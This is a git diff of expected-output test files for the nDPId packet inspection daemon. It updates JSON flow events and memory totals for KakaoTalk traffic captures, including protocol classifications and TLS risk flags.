+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1430069030751,"flow_last_seen":1430069031522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6399,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069031236,"flow_last_seen":1430069031782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7425,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1430069035967,"flow_last_seen":1430069036831,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5965,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1430069030751,"flow_last_seen":1430069031522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6399,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069031236,"flow_last_seen":1430069031782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7425,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1430069035967,"flow_last_seen":1430069036831,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5965,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","packets-captured":347,"packets-processed":347,"total-skipped-flows":0,"total-l4-payload-len":52012,"total-not-detected-flows":0,"total-guessed-flows":5,"total-detected-flows":33,"total-detection-updates":32,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":236,"global_ts_msec":1430069073299} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 347/347 @@ -242,9 +242,9 @@ ~~ total active/idle flows...: 38/38 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6032667 bytes -~~ total memory freed........: 6032667 bytes -~~ total allocations/frees...: 118829/118829 +~~ total memory allocated....: 6164199 bytes +~~ total memory freed........: 6164199 bytes +~~ total allocations/frees...: 121590/121590 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 1834 chars diff --git a/test/results/KakaoTalk_talk.pcap.out b/test/results/KakaoTalk_talk.pcap.out index 157eebe67..31d82f1b9 100644 --- a/test/results/KakaoTalk_talk.pcap.out +++ b/test/results/KakaoTalk_talk.pcap.out @@ -18,13 +18,13 @@ 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1430069161833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069161833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUv0AAPwaqgwoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOBNAAACBAV4BAIICgALPk8AAAAAAQMDBw=="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069161865,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1430069161865,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069161865,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACioy0AAjgYyVNg63KEKGFK8Abvded6D6B\/TTMkUUBSjubgsAAA="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1430069159456,"flow_last_seen":1430069161892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1430069161892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1430069159456,"flow_last_seen":1430069161892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1430069161892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069163715,"flow_last_seen":1430069163715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069163715,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1430069163715,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163715,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzn5UAAPwb5gwoYUrxuTI8ygMgfkPcR2OkAAAAAoAI5CAV2AAACBAV4BAIICgALPwwAAAAAAQMDBw=="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1430069163856,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163856,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8H5CAyJJ42pD3EdjqoBI4kOpNAAACBAV4BAIICkTbaagACz8MAQMDCQ=="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1430069163867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069163867,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTn5kAAPwb5igoYUrxuTI8ygMgfkPcR2OqSeNqRgBAAc1DtAAABAQgKAAs\/HETbaag="} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069163715,"flow_last_seen":1430069163878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069163878,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01497{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069163715,"flow_last_seen":1430069164107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069164107,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069163715,"flow_last_seen":1430069163878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069163878,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01497{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069163715,"flow_last_seen":1430069164107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069164107,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164656,"flow_last_seen":1430069164656,"flow_idle_time":7580000,"flow_min_l4_payload_len":442,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":442,"midstream":1,"thread_ts_msec":1430069164656,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 